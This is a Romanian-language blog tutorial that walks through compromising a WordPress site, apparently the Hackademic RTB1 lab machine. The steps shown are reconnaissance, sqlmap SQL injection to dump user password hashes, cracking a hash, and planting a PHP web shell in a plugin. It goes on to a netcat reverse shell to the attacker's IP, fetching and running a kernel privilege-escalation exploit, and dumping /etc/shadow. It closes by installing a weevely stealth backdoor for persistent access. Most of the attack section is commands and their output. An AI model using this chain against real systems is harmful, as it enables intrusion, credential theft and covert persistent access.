Wordpress Hacking

Cum sa 'penetrezi' un site wordpress? Raspunsul la aceasta intrebare e destul de greu de determinat, pur si simplu deoarece sunt foarte multe cai de a 'hacka' un website.

Ma rog, sa presupunem ca site-ul este hack-test.com

Dam cu ping, sa aflam IP-ul serverului.
(start>run>cmd...stiti vrajeala

)

Acum avem 173.236.138.113 IP-ul serverului unde este hostata tinta noastra.

Pentru a gasi alte site-uri hostate pe acelasi server, vom folosi sameip.org:

Sunt 26 de alte site-uri hostate pe serverul [173.236.138.113]. Multi dintre hackeri vor tinti toate celelalte site-uri de pe acelasi server pentru a`ti "penetra" site-ul. Dar in scop de studiu, vom lasa de`o parte celelalte site-uri si ne vom axa pe tinta noastra initiala.

Vom avea nevoie de ceva mai multe informatii despre tinta, cum ar fi:

1) DNS: (A, NS, TXT, MX si SOA)

2) Tipul de Web Server (Apache, IIS, Tomcat)

3) Numele, adresa, email si telefon

5) Script-urile pe care le foloseste site-ul (php, asp, asp.net, jsp, cfm)

6) Sistemul de operare (Unix, Linux, Windows, Solaris)

7) Port-urile deschise (80, 443, 21, etc.)

Intai haideti sa aflam DNS-ul. Ne vom folosi de "Who.is" sa realizam acest lucru:

HACK-TEST.COM DNS RECORDS:

Acum sa determinam tipul de web server:

Dupa cum vedeti, web serverul este Apache. Vom determina versiune mai tarziu.

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank:

1 Month: 3,213,986 3 Month: 2,161,753
Page Views per Visit:

1 Month: 2.0 3 Month: 3.7

Acum sa determinam Numele, adresa, email-ul si telefonul 'tintei' noastre:

Acum detinem date despre inregistrare si ceva alte informatii vitale despre tinta. Putem sa cautam acum tipul de script-uri pe care le foloseste site-ul + OS type si versiunea web serverului, folosind o unealta smechera in backtrack 5 R1 numita Whatweb:

Code:

root@bt:/pentest/enumeration/web/whatweb# ./whatweb  hack-test.com

Acum am descoperit ca site-ul foloseste faimosul php script numit WordPress, sistemul de operare, Fedora Linux si versiunea web serverului este apache 2.2.15. Acum sa gasim ceva porturi deschise.

Vom folosi nmap pentru asta:

1 - Cautam serviciile ce se executa pe server:

Code:

root@bt:/# nmap -sV hack-test.com 
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware) 
 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
 
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2 - Cautam server OS

Code:

root@bt:/# nmap -O hack-test.com 
 
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh 
 
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop 
 
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
 
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

Doar port 80 este deschis si OS este Linux 2.6.22(Fedora Core 6)

Acum ca am adunat toate informatiile importante despre site-ul tinta, il vom scana pentru vulnerabilitati de genul, SQL Injection, Blind SQL Injection, LFI, RFI, XSS, CSRF, s.a.m.d.

Vom folosi Nikto.pl sa adunam informatii,poate, unele dintre ele vulnerabilitati:

Code:

root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com 
 
- Nikto v2.1.4 
 
--------------------------------------------------------------------------- 
 
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03 
 
--------------------------------------------------------------------------- 
 
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds) 
 
--------------------------------------------------------------------------- 
 
+ 1 host(s) tested

Vom folosi de asemenea W3AF. (Gasiti acest tool in backtrack 5 R1).

Code:

root@bt:/pentest/web/w3af# ./w3af_gui 
 
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0 
 
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.

Vom insera site-ul tintei noastre alegand optiunea full audit:

Dupa ceva timp, scanarea se va termina si vei vedea:

Site-ul tintei noastre este vulnerabil la SQL Injection, xss si altele!

Sa aruncam o privire peste SQL Injection vulnerability:

http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220

Acesta este URL-ul vulnerabil si cat este parametrul vulnerabil.

Acum, sa exploatam vulnerabilitatea:

Vom gasi ca acea exploatare a vulnerabilitatii va esua, deci, vom folosi, sqlmap pentru treaba asta, si sa descarcam toate informatiile bazei de date de care avem nevoie sa 'penetram' tinta.

Folosim sqlmap cu -u url

Dupa cateva secunde vei vedea:

Scrie n si apasa enter pentru a continua

Dupa cum vezi, site-ul este vulnerabil la error-based sql injection si baza de date mysql versiunea 5

Acum sa gasim toate bazele de date adaugand "--dbs "

Vom gasi 3 baze de date

Acum urmeaza sa descarcam tabelele bazei de date wordpress adaugand "-D wordpress --tables "

Vom gasi toate tabele wordpress:

Noi avem nevoie sa descarcam "wp_users", pentru a gasi toti utilizatoii(admin?) informatii (user id si password hash), ulterior crack-area hash-ului pentru a intra in control panel-ul wordpress (wp-admin)

Vom extrage coloanele din tabelul "wp-users" adaugand "-T wp_users --columns "

Si vom gasi 22 de coloane:

Avem nevoie doar sa descarcam coloanele. Deci vom descarca (user_login and user_pass) adaugand

-C user_login,user_pass -dump

Vom gasi informatii importante; acum am gasit userii si password hash

Acum vom fi nevoiti sa crack-am aceste hash-uri in plain text password. Vom folosi site-ul, "Online Hash Crack MD5 / LM / NTLM / SHA1 / MySQL5 / MySQL323 / MD4 / WPA / WPA2 - Passwords recovery - Reverse hash lookup Online - Hash Calculator"
Unde vom incerca sa crack-am hash-ul 7CBB3252BA6B7E9C422FAC5334D22054

Si plain text este q1w2e3

Numele de utilizator este "GeorgeMiller"

Ne vom loga acum cu aceste informatii in "wp-admin "

Si, suntem inauntru!

Urca un php web shell pentru a executa ceva comenzi de linux pe site-ul tintei.

Vom edita un plugin in wordpress numit "Textile" sau orice alt plugin gasim in pagina de pluginuri.

Apoi alege sa-l modifici:

Vom insera un php web shell in locul plug-inului real. Dupa ce terminam lucru acesta, ii dam "update file "
si rasfoim noul nostru php shell.

Acum ca shell-ul functioneaza, putem manipula fisierele site-ului, dar noi vrem sa obtinem acces la root si sa hackam toate site-urile.

Vom alege "back-connect" din php web shell si facem o connexiune cu ip-ul nostru "192.168.1.6" pe portul "5555"

Dar inainte sa ne conectam, intai trebuie sa configuram netcat pe portul "5555" pe sistemul informatic al atacatorului.

Acum dai connect si vei vedea:

Acum sa incercam ceva comenzi de linux:

Code:

id 
 
uid=48(apache) gid=489(apache) groups=489(apache) 
 
pwd 
 
/var/www/html/Hackademic_RTB1/wp-content/plugins 
 
uname -a 
 
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

comanda id este folosita sa ne arate care este user id, si group-ul.

comanda pwd este folosita sa ne arate calea noastra curenta catre server

comanda uname -a este folosita sa ne arate ceva informatii despre versiunea kernel

Bun, acum stim ca versiunea kernel este 2.6.31.5-127.fc12.1686

Sa cautam in exploit-db.com ceva exploit-uri pentru aceasta versiune, sau una mai recenta.

Vom scrie “kernel 2.6.31 ”

Dupa ce le incercam pe toate pe server-ul nostru, niciuna dintre ele nu a functionat, dar atunci am folosit un nou exploit

Linux RDS Protocol Local Privilege Escalation

Si am folosit aceasta comanda pe shell-ul meu netcat

Code:

wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c' 
 
0K ...... 100% 29.7K=0.2s

Am folosit comanda wget sa aducem exploitul de pe exploit-db.com si am folosit -O sa-l redenumim in roro.c

Nota: majoritatea exploit-urile pt linux kernel sunt dezvoltate in c, deci il salvam cu extensia .c, arunca o privire peste sursa lui si vei gasi:

Code:

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 


#define RECVPORT 5555

#define SENDPORT 6666


int prep_sock(int port)

{


int s, ret;

struct sockaddr_in addr;


s = socket(PF_RDS, SOCK_SEQPACKET, 0);


if(s < 0) {

printf(“[*] Could not open socket.\n”);

exit(-1);

}


memset(&addr, 0, sizeof(addr));

Toate dintre liniile de mai sus indica faptul ca exploit-ul este scris in C

Dupa ce salvam exploit-ul pe server, il vom compita in format elf folosind:

gcc roro.c -o roro

Dupa care vom executa exploit-ul scriind :

Code:

./roro 
 [*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Linux kernel >= 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer...

Dupa care vom scrie

Id

Vom vedea ca noi suntem root !

uid=0 (root) gid=0 (root)

Acum putem vedea fisierul /etc/shadow

Code:

cat /etc/shadow 
 
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::

Apoi, /etc/passwd

Code:

cat /etc/passwd 
 
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash

Putem cracka toate acestea folosind "john the ripper"

Dar nu vom face asta; vrem sa ne mentinem accesul ca sa putem veni sa vizitam/hackam serverul oricand

Vom folosi weevely la un mic si encodat php backdoor cu parola de protectie, si urcam acest php backdoor pe serverul nostru.

Sa incepem:

1 - optiunile pentru weevely:

Code:

root@bt:/pentest/backdoors/web/weevely# ./main.py - 
 
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 
 
Usage: main.py [options] 
 
Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires -u and -p
.
-t, --terminal Start a terminal-like session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the give
file, in the form 'label,url,password' where label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor . 
 
-u URL, --url=URL Remote backdoor URL .

2 - Vom crea un php backdoor cu parola wubi folosind weevely:

Code:

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p wubi 
 
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 
 
+ Backdoor file 'hax.php' created with password 'wubi'.

3 - Urcam php backdoor-ul nostru pe server folosind php web shell-ul

Dupa ce l`am urcat, ne vom conecta la el folosind:

Code:

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p wubi
 
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/ 
 
+ Using method 'system()'.
+ Retrieving terminal basic environment variables . 
 
[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins]

Sa testam hax.php backdoor

Concluzie:
In acest articol, am invatat ceva tehnici care sunt folosite de hackeri, pentru a tinti si 'penetra' site-ul si serverul tau. Sper ca ti s`a parut interesant. Urmatorul tutorial va fi despre cum sa ne protejam impotriva acestor atacuri.

Pagini

Wordpress Hacking

Niciun comentariu:

Etichete

Site-Link